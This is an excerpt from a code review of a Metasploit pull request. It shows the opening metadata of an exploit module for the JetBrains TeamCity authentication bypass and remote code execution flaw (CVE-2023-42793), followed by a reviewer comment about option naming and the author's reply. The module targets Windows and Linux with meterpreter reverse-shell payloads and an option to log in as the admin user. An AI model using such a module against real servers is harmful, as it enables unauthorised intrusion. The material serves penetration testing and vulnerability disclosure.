modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb

```diff
@@ -0,0 +1,256 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution
+          against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are
+          vulnerable to this issue. The vulnerability was originally discovered by SonarSource.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-42793'],
+          ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'],
+          ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/']
+        ],
+        'DisclosureDate' => '2023-09-19',
+        'Platform' => %w[win linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # By default TeamCity listens for HTTP requests on TCP port 8111.
+        Opt::RPORT(8111),
+        # The first user created during installation is an administrator account, so the ID will be 1.
+        OptInt.new('TeamCityAdminID', [true, 'The ID of an administrator account to authenticate as', 1]),
```

Comment:
I think for normal options the convention is uppercased and snakecased, i.e. `TEAM_CITY_ADMIN_ID`

Reply:
Opps, resolved in [89940e8](https://github.com/rapid7/metasploit-framework/pull/18408/commits/89940e8b08a198fb8d3d459da6ca9a025c47b9ef), thanks!